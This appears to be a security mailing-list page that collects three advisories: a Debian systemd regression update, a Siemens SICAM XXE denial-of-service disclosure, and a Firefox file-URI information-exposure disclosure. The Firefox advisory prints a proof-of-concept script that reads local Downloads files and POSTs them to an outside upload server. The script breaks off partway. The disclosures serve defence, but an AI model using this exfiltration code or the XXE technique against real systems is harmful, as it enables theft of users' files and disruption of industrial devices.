[SECURITY] [DSA 4367-2] systemd regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4367-2 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso January 15, 2019 https://www.debian.org/security/faq - - Package: systemd The Qualys Research Labs reported that the backported security fixes shipped in DSA 4367-1 contained a memory leak in systemd-journald. This and an unrelated bug in systemd-coredump are corrected in this update. Note that as the systemd-journald service is not restarted automatically a restart of the service or more safely a reboot is advised. For the stable distribution (stretch), these problems have been fixed in version 232-25+deb9u8. We recommend that you upgrade your systemd packages. For the detailed security status of systemd please refer to its security tracker page at: https://security-tracker.debian.org/tracker/systemd Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlw+CIxfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0TAOw/6AhNiQlXjFUuQojPreWohnhmdpDN+AWwT0xEL+f1mSxh1UXKCDjFYPqDT oCCOPoCHchrXzZR3xv5PqhOvFzWEQnmWpku5MgE2gJ/2UJvjQ2CUzObuQ5f4/WVx d+QMStfUhVCrzYdE/CECDg8HTJIb1ApqMTYRlS4NWQkZeBS6cLqfaNnn0++ZdU0O uEUN7GH+/oF2kbzXZe5/Y+CsdJ6/Sy2ipHrQLh6ABkSz9yyuKC6tQiLqznpumqpk nEejq5drLdAAEU2xC8hfbb485qvtxrFJMu3VXHY56aNnEY5kTjA/V7htN6gjIwE4 7xvUpFY2h6Rh5l46reQ7pigg5pQIyX8zd/PSCzpXkZY9ph3yr2OWCBGewa3LQfiN A/MCY58oZ86uVKokbPIdFdWHXu0P0Ghzvoag7Z+bksRKHTR6FWeGt74Fcg/5Wl/b hQhdrzJrf1mtI6HfV06NKyHjO3nWvzWgFvUAM8RX8yPU7J9ubf34vS5cWPU4MS2+ EQPmXWT72X/KolkalsvEOTsy54OdZmCIAiFbzLfQkVc26cu32Ka9YpIVRtv3WHxp NuDVC8fS2jivQJ3F88rA2NKer/1sGLpmDZGcqOxOPUO+ibCQ9pyL94KsL0k2oLqd t430+tu7AALHgLz/iW3v9dR1Qpvz7IRrXAPffVz+5ykIfRSDHpo= =yZ9m -END PGP SIGNATURE-
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: SICAM A8000 Series # Vendor: Siemens # CSNC ID: CSNC-2019-002 # CVE ID: CVE-2018-13798 # Subject: SICAM Webinterface XXE DoS # Risk: Medium (CVSS 3.0 Base Score: 5.3) # CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C # Effect: Unauthenticated remotely exploitable # Authors: Emanuel Duss # Nicolas Heiniger # Date: 2019-01-14 # # Introduction The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device range for telecontrol and automation applications in all areas of energy supply. This device offers a web management interface for performing simple management tasks. During a penetration test, Compass found a denial-of-service vulnerability in the Siemens SICAM web server. The web management interface is vulnerable against the XXE billion laughs attack [2] using XML entities. Successful exploitation can be performed unauthenticated over the network. Affected * SICAM A8000 CP-8000 < V14 * SICAM A8000 CP-802X < V14 * SICAM A8000 CP-8050 < V2.00 Technical Description - When a login on the web management interface is performed, the following request is sent to the server: POST /sicweb-ajax/auth HTTP/1.1 Host: 10.5.23.42 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.5.23.42 Content-Type: application/xml Content-Length: 118 Connection: close By modifying the XML message, it's possible to perform a billion laughs denial of service attack against the web management interface: POST /sicweb-ajax/auth HTTP/1.1 Host: 10.5.23.42 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.5.23.42/ Content-Type: application/xml Content-Length: 1679 Connection: close ]> The XML parser on the device tries to resolve the external entities. This will consume all available memory and the web management interface does not respond anymore. If the web management interface is refreshed in the browser, the following message appears: The device is currently unreachable. Retrying to connect. Other services on the device, like the one used by the ToolboxII for configuring the device or the IEC104 service, will still work properly and are not affected by this attack. Only the web management interface remains unusable until the device is rebooted. It's not possible to use XXE to read local or remote files using the SYSTEM directive. Vulnerability Classification * CVSS v3.0 Base Score: 5.3 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C Remediation --- * SICAM A8000 CP-8000: Update to V14 * SICAM A8000 CP-802X: Update to V14 * SICAM A8000 CP-8050: Update to V2.00 or higher Please see the Siemens advisory [3] for the download links. As a workaround, it's also possible to restrict the access to the webserver on port 80/tcp and 443/tcp using a firewall. Acknowledgments --- We thank Siemens for the coordinated disclosure. Timeline 2018-05-28:Vulnerability discovered by Emanuel Duss and Nicolas Heiniger 2018-05-28:Informed customer 2018-06-06:Initial vendor notification 2018-03-18:Vendor informed us that they will publish an advisory 2019-01-08:Siemens published advisory [3] 2019-01-11:Compass published advisory containing technical information References -- [1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx [2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs [3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt
[SYSS-2018-041] Mozilla Firefox - Information Exposure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2018-041 Product: Firefox Manufacturer: Mozilla Affected Versions: <= 64 Tested Versions: 61, 62, 63, 64 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2018-07-19 Solution Date: - Public Disclosure: 2019-01-16 CVE Reference: Not yet assigned Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH ~~~ Overview: Mozilla Firefox is a web browser available for various platforms including Windows, Linux, Mac, Android, and iOS [1]. It is one of the most popular web browsers according to StatCounter [2]. An overly liberal same-origin policy for file URIs and a bug in the implementation of this policy make Firefox vulnerable to exposure of local files to a remote attacker. ~~~ Vulnerability Details: Firefox's same-origin policy for file URIs allows local files to read other files in the same directory but not the directory index [3]. For example, a file with the URI file:///home/joe/Dowloads/aFile.html can read file:///home/joe/Dowloads/anotherFile.html, but it should not be able to read file:///home/joe/Dowloads/. We discovered, however, a violation of this policy in the special case when a user first opens a local directory, e.g., file:///home/joe/Dowloads/, in the browser and from there navigates to a file in this directory, e.g., file:///home/joe/Dowloads/aFile.html. In this case, aFile.html can read the Downloads directory index. This allows a malicious script in aFile.html to read all files in this directory by referring to each of them by its respective filename, and to send all the data to a remote server controlled by the attacker. The following attack scenario seems plausible. A user saves a HTML file in the Downloads folder. The victim user might have received the file per email; or downloaded it from a malicious website offering, e.g. free eBooks, or picture albums, etc.; or downloaded it from a corporate website where a malicious employee had uploaded it. The victim clicks on the filename in the file manager. The file is opened with the default Firefox browser. The victim is presented with a directory index and a message explaining that the file is "protected" and the user should open it in "safe mode" by clicking on the link in the directory index. The victim clicks again on the filename, this time in the browser's directory listing. The contents of the HTML document is displayed. In the background, the malicious JavaScript reads, first, the directory index, then, the contents of each file in the Downloads directory, and sends all these data to a website controlled by the attacker. ~~~ Proof of Concept (PoC): We offer a test website [5] where a user can check if a browser is vulnerable to evilXHR. The above scenario is implemented by the following HTML file evilXHR.html: evilXHR https://ptvb.sy.gs/evilXHR/base64ArrayBuffer.js"> // The script will be called from this HTML file: var htmlName = 'evilXHR.html'; // Files will be uploaded to this site: var siteURL = 'https://ptvb.sy.gs/evilXHR/'; var phpURL = siteURL + 'upload.php'; var cType = 'application/x-www-form-urlencoded'; var guID = Date.now() + Math.random().toString().substr(3,8); var uploadPathURL = siteURL + 'Uploads/' + guID; //--- function singleFileEvilXHR(fName) { var xGetFile = new XMLHttpRequest(); xGetFile.onreadystatechange = function() { if (this.readyState == 4) { var xPostFile = new XMLHttpRequest(); xPostFile.open('POST', phpURL); var fURL = encodeURIComponent(this.responseURL); var fData = encodeURIComponent(base64ArrayBuffer(this.response)); xPostFile.setRequestHeader('Content-Type', cType); xPostFile.send('guID='+guID + '&fURL='+fURL + '&fData='+fData); } } xGetFile.open('GET', fName); xGetFile.responseType = 'arraybuffer'; xGetFile.send(); } //--- function allFilesEvilXHR() { var xGetDir = new XMLHttpRequest(); xGetDir.onreadystatechange = function() { if (this.readyState == 4) { var xPostDir = new XMLHttpRequest(); xPostDir.open('POST', phpURL); var dData = encodeURIComponent(this.response); xPostDir.setRequestHeader('Content-Type', cType); xPostDir.send('guID=' + guID + '&dData=' + dData); var dirIndex = this.response.split('\n'); for (var n = 2; n < dirIndex.length-1; n++) { var dirIndexEntry = dirIndex[n].split(' '); if (dirIndexEntry[4] == 'FILE' && dirIndexEntry[1] != htmlName) { singleFileEvilXHR(dirIndexEntry[1]); } } } }